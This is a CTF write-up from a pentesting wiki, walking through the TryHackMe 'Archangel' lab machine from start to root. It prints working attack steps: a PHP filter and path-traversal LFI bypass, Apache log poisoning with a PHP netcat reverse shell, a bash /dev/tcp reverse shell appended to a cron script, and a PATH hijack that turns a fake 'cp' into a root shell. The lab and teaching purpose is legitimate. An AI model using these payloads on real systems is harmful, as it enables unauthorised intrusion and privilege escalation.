Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page

Was this helpful?

  1. Writeups
  2. TryHackMe
  3. Linux

Archangel

Last updated 2 years ago

Was this helpful?

Nmap

sudo nmap 10.10.24.89 -p- -sS -sV  

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking at the immediate page on port 80 we see a hostname we can use of mafialive.thm.

I added this into /etc/hosts. Before checking the new hostname I scanned the IP further with dirsearch.py and only got one interesting hit on 'flags' which was a Rick Roll...

I then decided to browse tomafialive.thm and we immediately get the first flag.

Running dirsearch.py against this host reveals /robots.txt.

python3 dirsearch.py -u http://mafialive.thm/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -t 75 --full-url 

Browsing to and reading the contents of robots.txt the file contains the following:

User-agent: *
Disallow: /test.php

Browsing to /test.php shows the below page.

Clicking the button runs the string 'Control is an illusion'. We can see from the URL bar test.php is 'viewing' /var/www/html/development_testing/mrrobot.php.

We can try a PHP filter on base64 to attempt to read a file. We can run the command below to read the contents of test.php to see what it is trying to do.

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

Running this with curl we are returned a base64 string.

Running the string against base64 returns a flag and the PHP code for test.php

echo '<base64-String>' | base64 -d

The PHP code is shown below for easier reading.

function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}
if(isset($_GET["view"])){
if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
    include $_GET['view'];
}else{

    echo 'Sorry, Thats not allowed';

Looking at the following line in the code:

if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {

The exclamation mark stands for NOT so this line is saying if 'Does Not' contain '../..' and 'Does' contain /var/www/html/development_testing then perform the function.

We can use a list of filters in an attempt to fuzz and bypass the restrictions in order to read local files. Remembering from the code snippet above for the view parameter we need to include /var/www/html/development_testing.

wfuzz -w filters.txt -u http://mafialive.thm/test.php?view=/var/www/html/development_testing/FUZZ --hl 15 

The parameter --hl 15 was used to filter out invalid responses. Resulting in matches for the results below:

Running curl against the target with a confirmed filter from above.

curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..///etc/passwd 

We can attempt to perform log poisoning to gain RCE and shell on the target machine. Running curl again we can view the Apache access log files. We can also see the recent requests performed above by wfuzz.

curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..///var/log/apache2/access.log

I will switch over th Burpsuite for this as it is easier to work in than curl if we need to troubleshoot our requests. Reload the page for accessing the access.log and catch the request with Burpsuite. We can then alter the user-agent field to contain PHP code. In the example below we are executing netcat on the target machine to create a reverse shell to us.

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.3.108 80 >/tmp/f') ?>

I then transferred over linpeas to the target machine. After exeucting linpeas identified a cronjob that is executed every minute by the user 'archangel'.

This cronjob is executing the file /opt/helloworld.sh. Viewing the permissions of the file we see we have the ability to edit the contents of the file. Currently every minute the file appends a new line to /opt/backupfiles/helloworld.txt

We can echo in a new line for a bash reverse shell and wait for it to execute.

echo 'sh -i >& /dev/tcp/10.14.3.108/443 0>&1' >> helloworld.sh

Start a netcat listener on our attacking machine.

sudo nc -lvp 443

Then wait for the cronjob to execute. If performed correctly we will have shell as the user 'archangel'.

Again running linpeas on the target machine we find a custom binary with the SUID bit set.

Looking at the results above we can see the binary is trying to execute the command 'cp' or copy without a full path specified and as such is unable to locate the binary.

We can take advantage of this by exporting a new path where our home directory is searched in first and then get our own malicious binary executed with the SUID privileges (root privileges).

First set a new path where the users home directory is the first entry.

PATH=/home/archangel:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

Then create a file containing a reverse shell in /home/archangel.

archangel@ubuntu:~$ touch cp
archangel@ubuntu:~$ echo '#!/bin/bash' > cp 
archangel@ubuntu:~$ echo 'sh -i >& /dev/tcp/10.14.3.108/80 0>&1' >> cp
archangel@ubuntu:~$ chmod +x cp

On the above commands we have created a file called 'cp' in the home directory of /home/archangel we have then set /bin/bash at the start of the script and then echo'd in on a new line a bash reverse shell. Finally we set the file to be executable with chmod.

Set up a netcat reverse shell on the attacking machine.

sudo nc -lvp 80

Then execute the backup binary:

archangel@ubuntu:~$ /home/archangel/secret/backup

We then receive a reverse shell as root.

I tried running LFI parameters on 'test.php?view=' and was unable to discover any exploits. Searching through the following resource: . We have several ways we can attempt to exploit the web application.

Use this file for Fuzzing: .

Once the request has been sent this will exist in access.log Simply reload the LFI for . This should then execute the PHP code and catch a shell on netcat on our attacking machine.

🚩
https://book.hacktricks.xyz/pentesting-web/file-inclusion
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/Intruders/Traversal.txt
http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..///var/log/apache2/access.log
http://mafialive.thm/
http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php